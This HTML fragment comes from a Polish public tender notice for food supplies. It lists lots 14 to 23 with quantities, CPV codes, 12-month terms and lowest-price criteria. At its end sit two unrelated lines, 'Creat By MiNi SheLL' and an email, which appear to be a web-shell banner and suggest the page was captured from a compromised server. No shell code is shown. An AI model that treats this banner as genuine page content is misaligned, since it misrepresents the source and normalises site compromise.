<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> oleje i tłuszcze zwierzęce lub roślinne - 2 pozycje: łącznie, 400 kg, 380 l.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkty mleczarskie - 10 pozycji: łącznie 1 520 kg, 3 200 szt., 9 645 l.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Różne produkty spożywcze - 11 pozycji: łącznie 1 974 kg, 3 080 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkty przemiału ziarna - 13 pozycji: łącznie 3 020 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet 18.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczywo, produkty piekarskie i ciastkarskie - 6 pozycji: łącznie 20 345 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet 19.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kakao, czekolada i wyroby cukiernicze - 6 pozycji: łącznie 340  kg, 2 100 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet 20.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kawa, herbata i podobne produkty - 8 pozycji: łącznie 351,5 kg, 820 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet 21.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło - 1 pozycja: łącznie 1 100 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.53.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet 22.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyprawy i przyprawy korzenne - 17 pozycji: łącznie 929 kg, 1 344 szt., 270 l.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet 23.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specjalne produkty odżywcze - 1 pozycja: łącznie 3 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com